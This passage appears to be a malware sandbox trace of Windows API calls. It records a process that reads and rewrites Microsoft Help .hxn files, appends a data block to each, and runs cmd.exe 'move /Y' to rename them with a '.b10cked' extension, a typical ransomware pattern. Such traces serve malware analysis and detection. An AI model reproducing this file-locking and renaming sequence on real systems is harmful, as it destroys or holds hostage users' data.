lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0199.640] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.641] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.641] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.642] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.642] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0199.642] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0199.642] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0199.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0199.646] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0199.646] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.647] CloseHandle (hObject=0x120) returned 1 [0199.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN") returned 0x27 [0199.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.649] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa14, dwThreadId=0xa48)) returned 1 [0199.660] CloseHandle (hObject=0x1b4) returned 1 [0199.660] CloseHandle (hObject=0x120) returned 1 [0199.660] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.660] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.660] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.660] ReleaseMutex (hMutex=0xf8) returned 1 [0199.660] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.661] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25645067534) returned 1 [0199.661] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.662] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0199.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.663] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0199.664] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.665] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0199.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0199.665] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0199.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0199.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0199.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0199.669] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0199.669] CloseHandle (hObject=0x120) returned 1 [0199.670] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN") returned 0x27 [0199.671] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0199.671] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc84, dwThreadId=0x55c)) returned 1 [0199.759] CloseHandle (hObject=0x1b4) returned 1 [0199.759] CloseHandle (hObject=0x120) returned 1 [0199.759] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.759] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0199.759] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0199.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.759] ReleaseMutex (hMutex=0xf8) returned 1 [0199.759] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.759] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.760] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0199.760] ReleaseMutex (hMutex=0xf8) returned 1 [0199.760] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25665856239) returned 1 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.869] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.870] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0199.871] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x152 [0199.871] SetFilePointer (in: hFile=0x120, 